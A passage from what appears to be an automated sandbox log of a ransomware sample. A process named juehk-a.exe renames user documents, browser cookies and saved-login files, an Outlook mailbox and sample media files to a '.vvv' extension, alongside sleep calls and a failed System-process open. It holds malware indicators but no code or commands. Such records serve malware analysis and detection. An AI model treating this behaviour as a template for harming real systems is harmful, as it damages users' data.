36940.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183318_999.txt
36941.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183318_999.txt.vvv
36942.            ads:
36943.          fid (ads:): 562949953516584
36944.          ntstatus: 0x0
36945.          CreateOptions: 0x0
36946.        file:
36947.          timestamp: 196268
36948.          mode: rename
36949.          sequenceNumber: 2583
36950.          filesize: 3118
36951.          processinfo:
36952.            pid: 1648
36953.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36954.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36955.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183320_091.txt
36956.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_wcf_CA_smci_20150619_183320_091.txt.vvv
36957.            ads:
36958.          fid (ads:): 562949953516587
36959.          ntstatus: 0x0
36960.          CreateOptions: 0x0
36961.        file:
36962.          timestamp: 196407
36963.          mode: rename
36964.          sequenceNumber: 2584
36965.          filesize: 34158
36966.          processinfo:
36967.            pid: 1648
36968.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36969.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36970.          old_name: C:\Users\Administrator\AppData\Local\Temp\hXWBxMP.jpg
36971.          new_name: C:\Users\Administrator\AppData\Local\Temp\hXWBxMP.jpg.vvv
36972.            ads:
36973.          fid (ads:): 562949953520896
36974.          ntstatus: 0x0
36975.          CreateOptions: 0x0
36976.        file:
36977.          timestamp: 196445
36978.          mode: rename
36979.          sequenceNumber: 2585
36980.          filesize: 14254
36981.          processinfo:
36982.            pid: 1648
36983.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36984.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36985.          old_name: C:\Users\Administrator\AppData\Local\Temp\kkAoJmdjG.xls
36986.          new_name: C:\Users\Administrator\AppData\Local\Temp\kkAoJmdjG.xls.vvv
36987.            ads:
36988.          fid (ads:): 562949953520894
36989.          ntstatus: 0x0
36990.          CreateOptions: 0x0
36991.        high_cpu:
36992.          timestamp: 198100
36993.          sequenceNumber: 2586
36994.          total_cpu: 77.272581585081596
36995.          processinfo:
36996.            tainted: true
36997.            pid: 2312
36998.            process_cpu: 77.272581585081596
36999.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
37000.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37001.        apicall:
37002.          timestamp: 198393
37003.          repeat: 50000
37004.          sequenceNumber: 2587
37005.          processinfo:
37006.            pid: 1648
37007.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37008.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37009.          dllname: kernel32.dll
37010.          apiname: Sleep
37011.          address: 0x0041ed5b
37012.        process:
37013.          timestamp: 198540
37014.          mode: opened
37015.          sequenceNumber: 2588
37016.          desiredaccess: 0x02000030
37017.          ntstatus: 0xc0000022
37018.          target:
37019.            processinfo:
37020.              pid: 4
37021.              tid: 0
37022.              imagepath: N/A
37023.          source:
37024.            processinfo:
37025.              pid: 1648
37026.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37027.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37028.        file:
37029.          timestamp: 198866
37030.          mode: rename
37031.          sequenceNumber: 2589
37032.          filesize: 10565150
37033.          processinfo:
37034.            pid: 1648
37035.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37036.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37037.          old_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft .NET Framework 4.5.2 Setup_20150619_113235616-MSI_netfx_Full_GDR_x64.msi.txt
37038.          new_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft .NET Framework 4.5.2 Setup_20150619_113235616-MSI_netfx_Full_GDR_x64.msi.txt.vvv
37039.            ads:
37040.          fid (ads:): 5066549580793238
37041.          ntstatus: 0x0
37042.          CreateOptions: 0x0
37043.        file:
37044.          timestamp: 199204
37045.          mode: rename
37046.          sequenceNumber: 2590
37047.          filesize: 272622
37048.          processinfo:
37049.            pid: 1648
37050.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37051.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37052.          old_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010  x64 Redistributable Setup_20150619_114629030-MSI_vc_red.msi.txt
37053.          new_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010  x64 Redistributable Setup_20150619_114629030-MSI_vc_red.msi.txt.vvv
37054.            ads:
37055.          fid (ads:): 844424930230714
37056.          ntstatus: 0x0
37057.          CreateOptions: 0x0
37058.        file:
37059.          timestamp: 199412
37060.          mode: rename
37061.          sequenceNumber: 2591
37062.          filesize: 287774
37063.          processinfo:
37064.            pid: 1648
37065.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37066.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37067.          old_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010  x86 Redistributable Setup_20150619_114555646-MSI_vc_red.msi.txt
37068.          new_name: C:\Users\Administrator\AppData\Local\Temp\Microsoft Visual C++ 2010  x86 Redistributable Setup_20150619_114555646-MSI_vc_red.msi.txt.vvv
37069.            ads:
37070.          fid (ads:): 562949953520054
37071.          ntstatus: 0x0
37072.          CreateOptions: 0x0
37073.        file:
37074.          timestamp: 199511
37075.          mode: rename
37076.          sequenceNumber: 2592
37077.          filesize: 4414
37078.          processinfo:
37079.            pid: 1648
37080.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37081.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37082.          old_name: C:\Users\Administrator\AppData\Local\Temp\ruI_Qihqo.doc
37083.          new_name: C:\Users\Administrator\AppData\Local\Temp\ruI_Qihqo.doc.vvv
37084.            ads:
37085.          fid (ads:): 562949953520893
37086.          ntstatus: 0x0
37087.          CreateOptions: 0x0
37088.        file:
37089.          timestamp: 199857
37090.          mode: rename
37091.          sequenceNumber: 2593
37092.          filesize: 990
37093.          processinfo:
37094.            pid: 1648
37095.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37096.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37097.          old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\10.0\TMGrpPrm.sav
37098.          new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\10.0\TMGrpPrm.sav.vvv
37099.            ads:
37100.          fid (ads:): 562949953520741
37101.          ntstatus: 0x0
37102.          CreateOptions: 0x0
37103.        file:
37104.          timestamp: 199920
37105.          mode: rename
37106.          sequenceNumber: 2594
37107.          filesize: 462
37108.          processinfo:
37109.            pid: 1648
37110.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37111.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37112.          old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMDocs.sav
37113.          new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMDocs.sav.vvv
37114.            ads:
37115.          fid (ads:): 9288674231548761
37116.          ntstatus: 0x0
37117.          CreateOptions: 0x0
37118.        file:
37119.          timestamp: 199933
37120.          mode: rename
37121.          sequenceNumber: 2595
37122.          filesize: 990
37123.          processinfo:
37124.            pid: 1648
37125.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37126.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37127.          old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMGrpPrm.sav
37128.          new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\11.0\TMGrpPrm.sav.vvv
37129.            ads:
37130.          fid (ads:): 1125899906939733
37131.          ntstatus: 0x0
37132.          CreateOptions: 0x0
37133.        file:
37134.          timestamp: 199966
37135.          mode: rename
37136.          sequenceNumber: 2596
37137.          filesize: 990
37138.          processinfo:
37139.            pid: 1648
37140.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37141.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37142.          old_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\9.0\TMGrpPrm.sav
37143.          new_name: C:\Users\Administrator\AppData\Roaming\Adobe\Acrobat\9.0\TMGrpPrm.sav.vvv
37144.            ads:
37145.          fid (ads:): 562949953520740
37146.          ntstatus: 0x0
37147.          CreateOptions: 0x0
37148.        file:
37149.          timestamp: 200450
37150.          mode: rename
37151.          sequenceNumber: 2597
37152.          filesize: 643406
37153.          processinfo:
37154.            pid: 1648
37155.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37156.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37157.          old_name: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
37158.          new_name: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.vvv
37159.            ads:
37160.          fid (ads:): 2251799813701303
37161.          ntstatus: 0x0
37162.          CreateOptions: 0x0
37163.        file:
37164.          timestamp: 200518
37165.          mode: rename
37166.          sequenceNumber: 2598
37167.          filesize: 574
37168.          processinfo:
37169.            pid: 1648
37170.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37171.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37172.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\cookies.txt
37173.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\cookies.txt.vvv
37174.            ads:
37175.          fid (ads:): 562949953520726
37176.          ntstatus: 0x0
37177.          CreateOptions: 0x0
37178.        file:
37179.          timestamp: 200584
37180.          mode: rename
37181.          sequenceNumber: 2599
37182.          filesize: 8766
37183.          processinfo:
37184.            pid: 1648
37185.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37186.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37187.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\prefs.js
37188.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\prefs.js.vvv
37189.            ads:
37190.          fid (ads:): 2533274790495574
37191.          ntstatus: 0x0
37192.          CreateOptions: 0x0
37193.        file:
37194.          timestamp: 200621
37195.          mode: rename
37196.          sequenceNumber: 2600
37197.          filesize: 1198
37198.          processinfo:
37199.            pid: 1648
37200.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37201.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37202.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\sessionstore.js
37203.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\sessionstore.js.vvv
37204.            ads:
37205.          fid (ads:): 2814749767189463
37206.          ntstatus: 0x0
37207.          CreateOptions: 0x0
37208.        file:
37209.          timestamp: 200633
37210.          mode: rename
37211.          sequenceNumber: 2601
37212.          filesize: 574
37213.          processinfo:
37214.            pid: 1648
37215.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37216.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37217.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons2.txt
37218.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons2.txt.vvv
37219.            ads:
37220.          fid (ads:): 32369622321822778
37221.          ntstatus: 0x0
37222.          CreateOptions: 0x0
37223.        file:
37224.          timestamp: 200645
37225.          mode: rename
37226.          sequenceNumber: 2602
37227.          filesize: 574
37228.          processinfo:
37229.            pid: 1648
37230.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37231.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37232.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons3.txt
37233.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons3.txt.vvv
37234.            ads:
37235.          fid (ads:): 1407374883652672
37236.          ntstatus: 0x0
37237.          CreateOptions: 0x0
37238.        file:
37239.          timestamp: 200693
37240.          mode: rename
37241.          sequenceNumber: 2603
37242.          filesize: 574
37243.          processinfo:
37244.            pid: 1648
37245.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37246.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37247.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\cookies.txt
37248.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\cookies.txt.vvv
37249.            ads:
37250.          fid (ads:): 562949953520733
37251.          ntstatus: 0x0
37252.          CreateOptions: 0x0
37253.        file:
37254.          timestamp: 200766
37255.          mode: rename
37256.          sequenceNumber: 2604
37257.          filesize: 9422
37258.          processinfo:
37259.            pid: 1648
37260.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37261.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37262.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\prefs.js
37263.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\prefs.js.vvv
37264.            ads:
37265.          fid (ads:): 2533274790495575
37266.          ntstatus: 0x0
37267.          CreateOptions: 0x0
37268.        file:
37269.          timestamp: 200794
37270.          mode: rename
37271.          sequenceNumber: 2605
37272.          filesize: 1294
37273.          processinfo:
37274.            pid: 1648
37275.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37276.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37277.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\sessionstore-backups\previous.js
37278.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\sessionstore-backups\previous.js.vvv
37279.            ads:
37280.          fid (ads:): 5629499534216117
37281.          ntstatus: 0x0
37282.          CreateOptions: 0x0
37283.        file:
37284.          timestamp: 200810
37285.          mode: rename
37286.          sequenceNumber: 2606
37287.          filesize: 574
37288.          processinfo:
37289.            pid: 1648
37290.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37291.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37292.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons2.txt
37293.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons2.txt.vvv
37294.            ads:
37295.          fid (ads:): 562949953520728
37296.          ntstatus: 0x0
37297.          CreateOptions: 0x0
37298.        file:
37299.          timestamp: 200822
37300.          mode: rename
37301.          sequenceNumber: 2607
37302.          filesize: 574
37303.          processinfo:
37304.            pid: 1648
37305.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37306.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37307.          old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons3.txt
37308.          new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons3.txt.vvv
37309.            ads:
37310.          fid (ads:): 562949953520729
37311.          ntstatus: 0x0
37312.          CreateOptions: 0x0
37313.        file:
37314.          timestamp: 204641
37315.          mode: rename
37316.          sequenceNumber: 2608
37317.          filesize: 271790
37318.          processinfo:
37319.            pid: 1648
37320.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37321.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37322.          old_name: C:\Users\Administrator\Documents\Outlook Files\Outlook.pst
37323.          new_name: C:\Users\Administrator\Documents\Outlook Files\Outlook.pst.vvv
37324.            ads:
37325.          fid (ads:): 1125899906917540
37326.          ntstatus: 0x0
37327.          CreateOptions: 0x0
37328.        file:
37329.          timestamp: 205373
37330.          mode: rename
37331.          sequenceNumber: 2609
37332.          filesize: 202254
37333.          processinfo:
37334.            pid: 1648
37335.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37336.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37337.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma
37338.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma.vvv
37339.            ads:
37340.          fid (ads:): 281474976726621
37341.          ntstatus: 0x0
37342.          CreateOptions: 0x0
37343.        file:
37344.          timestamp: 205394
37345.          mode: rename
37346.          sequenceNumber: 2610
37347.          filesize: 139614
37348.          processinfo:
37349.            pid: 1648
37350.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37351.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37352.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma
37353.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma.vvv
37354.            ads:
37355.          fid (ads:): 281474976726623
37356.          ntstatus: 0x0
37357.          CreateOptions: 0x0
37358.        file:
37359.          timestamp: 205424
37360.          mode: rename
37361.          sequenceNumber: 2611
37362.          filesize: 94878
37363.          processinfo:
37364.            pid: 1648
37365.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37366.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37367.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma
37368.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma.vvv
37369.            ads:
37370.          fid (ads:): 281474976726625
37371.          ntstatus: 0x0
37372.          CreateOptions: 0x0
37373.        file:
37374.          timestamp: 205470
37375.          mode: rename
37376.          sequenceNumber: 2612
37377.          filesize: 238046
37378.          processinfo:
37379.            pid: 1648
37380.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37381.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37382.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma
37383.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma.vvv
37384.            ads:
37385.          fid (ads:): 281474976726627
37386.          ntstatus: 0x0
37387.          CreateOptions: 0x0
37388.        file:
37389.          timestamp: 205580
37390.          mode: rename
37391.          sequenceNumber: 2613
37392.          filesize: 112782
37393.          processinfo:
37394.            pid: 1648
37395.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37396.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37397.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma
37398.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma.vvv
37399.            ads:
37400.          fid (ads:): 281474976726629
37401.          ntstatus: 0x0
37402.          CreateOptions: 0x0
37403.        file:
37404.          timestamp: 205704
37405.          mode: rename
37406.          sequenceNumber: 2614
37407.          filesize: 94878
37408.          processinfo:
37409.            pid: 1648
37410.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37411.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37412.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma
37413.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma.vvv
37414.            ads:
37415.          fid (ads:): 281474976726631
37416.          ntstatus: 0x0
37417.          CreateOptions: 0x0
37418.        file:
37419.          timestamp: 205716
37420.          mode: rename
37421.          sequenceNumber: 2615
37422.          filesize: 94878
37423.          processinfo:
37424.            pid: 1648
37425.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37426.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37427.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma
37428.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma.vvv
37429.            ads:
37430.          fid (ads:): 281474976726633
37431.          ntstatus: 0x0
37432.          CreateOptions: 0x0
37433.        file:
37434.          timestamp: 205735
37435.          mode: rename
37436.          sequenceNumber: 2616
37437.          filesize: 139614
37438.          processinfo:
37439.            pid: 1648
37440.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37441.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37442.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma
37443.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma.vvv
37444.            ads:
37445.          fid (ads:): 281474976726635
37446.          ntstatus: 0x0
37447.          CreateOptions: 0x0
37448.        file:
37449.          timestamp: 205749
37450.          mode: rename
37451.          sequenceNumber: 2617
37452.          filesize: 112782
37453.          processinfo:
37454.            pid: 1648
37455.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37456.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37457.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma
37458.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma.vvv
37459.            ads:
37460.          fid (ads:): 281474976726637
37461.          ntstatus: 0x0
37462.          CreateOptions: 0x0
37463.        file:
37464.          timestamp: 205777
37465.          mode: rename
37466.          sequenceNumber: 2618
37467.          filesize: 94878
37468.          processinfo:
37469.            pid: 1648
37470.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37471.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37472.          old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma
37473.          new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma.vvv
37474.            ads:
37475.          fid (ads:): 281474976726639
37476.          ntstatus: 0x0
37477.          CreateOptions: 0x0
37478.        file:
37479.          timestamp: 206196
37480.          mode: rename
37481.          sequenceNumber: 2619
37482.          filesize: 175342
37483.          processinfo:
37484.            pid: 1648
37485.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37486.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37487.          old_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mscorsvw.exe_dc6a793f89565b9ffe0b9deffef5f8de721b5e_cab_081bb04b\WERAE19.tmp.appcompat.txt
37488.          new_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mscorsvw.exe_dc6a793f89565b9ffe0b9deffef5f8de721b5e_cab_081bb04b\WERAE19.tmp.appcompat.txt.vvv
37489.            ads:
37490.          fid (ads:): 562949953439663
37491.          ntstatus: 0x0
37492.          CreateOptions: 0x0
37493.        file:
37494.          timestamp: 206235
37495.          mode: rename
37496.          sequenceNumber: 2620
37497.          filesize: 846
37498.          processinfo:
37499.            pid: 1648
37500.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37501.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37502.          old_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_80070422_d7638e9b4583aef4ba6602b7af2af4fc25fa3c_cab_078ccfdc\client_manifest.txt
37503.          new_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_80070422_d7638e9b4583aef4ba6602b7af2af4fc25fa3c_cab_078ccfdc\client_manifest.txt.vvv
37504.            ads:
37505.          fid (ads:): 281474976922435
37506.          ntstatus: 0x0
37507.          CreateOptions: 0x0
37508.        file:
37509.          timestamp: 209237
37510.          mode: rename
37511.          sequenceNumber: 2621
37512.          filesize: 33118
37513.          processinfo:
37514.            pid: 1648
37515.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37516.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37517.          old_name: C:\ProgramData\Real\RealPlayer\RDInstall-log.txt
37518.          new_name: C:\ProgramData\Real\RealPlayer\RDInstall-log.txt.vvv
37519.            ads:
37520.          fid (ads:): 844424930225985
37521.          ntstatus: 0x0
37522.          CreateOptions: 0x0
37523.        file:
37524.          timestamp: 209709
37525.          mode: rename
37526.          sequenceNumber: 2622
37527.          filesize: 36590
37528.          processinfo:
37529.            pid: 1648
37530.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37531.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37532.          old_name: C:\ProgramData\Real\RealPlayer\RDRepair-log.txt
37533.          new_name: C:\ProgramData\Real\RealPlayer\RDRepair-log.txt.vvv
37534.            ads:
37535.          fid (ads:): 562949953515328
37536.          ntstatus: 0x0
37537.          CreateOptions: 0x0
37538.        file:
37539.          timestamp: 212779
37540.          mode: rename
37541.          sequenceNumber: 2623
37542.          filesize: 14558
37543.          processinfo:
37544.            pid: 1648
37545.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37546.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37547.          old_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Content\browserrecordloader.js
37548.          new_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Content\browserrecordloader.js.vvv
37549.            ads:
37550.          fid (ads:): 562949953515383
37551.          ntstatus: 0x0
37552.          CreateOptions: 0x0
37553.        file:
37554.          timestamp: 212899
37555.          mode: rename
37556.          sequenceNumber: 2624
37557.          filesize: 2750
37558.          processinfo:
37559.            pid: 1648
37560.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37561.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37562.          old_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Skin\rp_logo.png
37563.          new_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Skin\rp_logo.png.vvv
37564.            ads:
37565.          fid (ads:): 562949953515497
37566.          ntstatus: 0x0
37567.          CreateOptions: 0x0
37568.        file:
37569.          timestamp: 213194
37570.          mode: rename
37571.          sequenceNumber: 2625
37572.          filesize: 12446
37573.          processinfo:
37574.            pid: 1648
37575.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37576.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37577.          old_name: C:\ProgramData\RealNetworks\RealDownloader\Scripts\bookmark.js
37578.          new_name: C:\ProgramData\RealNetworks\RealDownloader\Scripts\bookmark.js.vvv
37579.            ads:
37580.          fid (ads:): 562949953515382
37581.          ntstatus: 0x0
37582.          CreateOptions: 0x0
37583.        file:
37584.          timestamp: 213503
37585.          mode: rename
37586.          sequenceNumber: 2626
37587.          filesize: 879822
37588.          processinfo:
37589.            pid: 1648
37590.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37591.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37592.          old_name: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
37593.          new_name: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.vvv
37594.            ads:
37595.          fid (ads:): 281474976726986
37596.          ntstatus: 0x0
37597.          CreateOptions: 0x0
37598.        file:
37599.          timestamp: 213600
37600.          mode: rename
37601.          sequenceNumber: 2627
37602.          filesize: 846366
37603.          processinfo:
37604.            pid: 1648
37605.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37606.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37607.          old_name: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
37608.          new_name: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.vvv
37609.            ads:
37610.          fid (ads:): 281474976726988
37611.          ntstatus: 0x0
37612.          CreateOptions: 0x0
37613.        file:
37614.          timestamp: 213648
37615.          mode: rename
37616.          sequenceNumber: 2628
37617.          filesize: 595710
37618.          processinfo:
37619.            pid: 1648
37620.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37621.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37622.          old_name: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
37623.          new_name: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.vvv
37624.            ads:
37625.          fid (ads:): 281474976726991
37626.          ntstatus: 0x0
37627.          CreateOptions: 0x0
37628.        file:
37629.          timestamp: 213699
37630.          mode: rename
37631.          sequenceNumber: 2629
37632.          filesize: 776126
37633.          processinfo:
37634.            pid: 1648
37635.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
